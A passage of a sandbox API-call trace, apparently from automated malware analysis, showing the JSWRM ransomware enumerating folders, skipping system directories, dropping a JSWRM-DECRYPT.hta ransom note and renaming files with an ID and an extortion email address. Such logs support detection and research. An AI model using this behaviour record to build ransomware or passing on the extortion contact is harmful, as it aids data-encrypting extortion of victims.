lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0068.628] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.628] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10079532331814896) returned 0 [0068.628] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.628] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.628] CloseHandle (hObject=0xffffffff) returned 1 [0068.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0068.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0068.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0068.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0068.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0068.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.628] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0068.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0068.629] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e8e6bbf, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e8e6bbf, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e8e6bbf, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.629] FindClose (in: hFindFile=0x232000 | out: hFindFile=0x232000) returned 1 [0068.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.629] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d988, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0068.629] lstrcmpiW (lpString1="pt-BR", lpString2=".") returned 1 [0068.629] lstrcmpiW (lpString1="pt-BR", lpString2="..") returned 1 [0068.629] lstrcmpiW (lpString1="pt-BR", lpString2="...") returned 1 [0068.629] lstrcmpiW (lpString1="pt-BR", lpString2="windows") returned -1 [0068.629] lstrcmpiW (lpString1="pt-BR", lpString2="recovery") returned -1 [0068.629] lstrcmpiW (lpString1="pt-BR", lpString2="perflogs") returned 1 [0068.629] lstrcmpiW (lpString1="pt-BR", lpString2="documents and settings") returned 1 [0068.629] lstrcmpiW (lpString1="pt-BR", lpString2="$RECYCLE.BIN") returned 1 [0068.629] lstrcmpiW (lpString1="pt-BR", lpString2="system volume information") returned -1 [0068.629] lstrcmpiW (lpString1="pt-BR", lpString2="msocache") returned 1 [0068.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0068.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0068.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0068.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\jswrm-decrypt.hta")) returned 0xffffffff [0068.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.630] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.631] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.631] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.632] CloseHandle (hObject=0x454) returned 1 [0068.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.632] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\jswrm-decrypt.hta")) returned 0x20 [0068.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0068.632] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d988, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f9223d3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0068.632] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.632] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d988, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f9223d3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.633] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.633] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.633] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f9223d3, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f9223d3, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f9223d3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.633] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0068.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0068.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.633] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e8e6bbf, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e8e6bbf, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e8e6bbf, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.633] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.633] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.633] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.633] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.633] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.633] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.634] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.634] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.634] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.634] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0068.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0068.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0068.634] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.634] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10080253886322472) returned 0 [0068.634] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.634] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.634] CloseHandle (hObject=0xffffffff) returned 1 [0068.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0068.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0068.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0068.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0068.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0068.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0068.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.635] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0068.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0068.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0068.635] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e8e6bbf, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e8e6bbf, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e8e6bbf, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.635] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0068.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0068.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.635] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ddb8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0068.635] lstrcmpiW (lpString1="pt-PT", lpString2=".") returned 1 [0068.635] lstrcmpiW (lpString1="pt-PT", lpString2="..") returned 1 [0068.635] lstrcmpiW (lpString1="pt-PT", lpString2="...") returned 1 [0068.635] lstrcmpiW (lpString1="pt-PT", lpString2="windows") returned -1 [0068.635] lstrcmpiW (lpString1="pt-PT", lpString2="recovery") returned -1 [0068.635] lstrcmpiW (lpString1="pt-PT", lpString2="perflogs") returned 1 [0068.635] lstrcmpiW (lpString1="pt-PT", lpString2="documents and settings") returned 1 [0068.636] lstrcmpiW (lpString1="pt-PT", lpString2="$RECYCLE.BIN") returned 1 [0068.636] lstrcmpiW (lpString1="pt-PT", lpString2="system volume information") returned -1 [0068.636] lstrcmpiW (lpString1="pt-PT", lpString2="msocache") returned 1 [0068.636] 